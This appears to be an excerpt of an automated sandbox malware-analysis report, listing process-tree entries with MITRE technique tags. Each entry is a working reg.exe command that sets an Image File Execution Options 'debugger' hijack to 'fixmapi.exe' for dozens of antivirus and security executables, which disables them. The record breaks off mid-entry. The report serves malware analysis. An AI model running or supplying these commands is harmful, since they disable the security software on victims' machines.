    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CpService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sys.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lass.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3704
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ByteFence.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KasAVSrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jixlea.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowserManagerGUI.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowserManager.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowserManagerShow.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\skrolls.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUAMain.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Terms.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scclient.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Javaj.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Antivirus_Free_Edition_x86.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InstantSupport.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hitleap-viewer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:832
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hitleap-viewer-browser.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TINY.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2728
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explores.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SBAMSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SBAMTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4412
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\indexer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4620
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4944
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Security.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmon32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\splwowc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[email protected]" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQLiveService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQProtect.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[email protected]" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ErrorsChecking.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ErrorCheck.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3296
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mwse.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninst.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2248
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMFTips.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMFsrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMF.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DriverBooster.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ASCTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ASCService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3476
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Service.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nip.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2036
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nsesvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3108
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zlh.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zanda.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:744
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Njeeves.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\elogsvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3740
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvpncsvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3452
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchose.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.dll" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsCtrlC.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3560
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDMiniDlUpdate.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:880
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Go.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDdaSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BaiduAnSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDALeakfixer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bddownloader.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BaiduAnTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Smc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\server.dat" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3940
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wqscmc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Q.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3444
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jozruq.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svshost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipts.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Desktop Locker.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3224
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winIogon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\traysser.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webtmr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wintmr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BurstTCPClient.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Isass.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\consctl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nethtsrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smcc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cputest.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ybrwicon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netupdsrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2740
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\syshost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USBGuard.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prtgwatchdog.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PRTG Traffic Grapher.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\econser.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:4356
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESERV.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\econceal.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trayeser.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogn.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamd.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrcs.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3704
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpzaw.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4968
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\System32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mqsgmo.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svcnoct.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xstartui.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hkcmd.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4940
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsasvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinCtrProc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SpyHunter4.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SH4Service.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setap_c.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nheqminer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sapissvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\emlproxy.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2320
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ONLINENT.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:832
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPSrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\quhlpsvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BaiduProtect.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BaiduHips.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N360.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4628
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N360ChkServ.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VsTskMgr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UdaterUI.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2684
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\naPrdMgr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
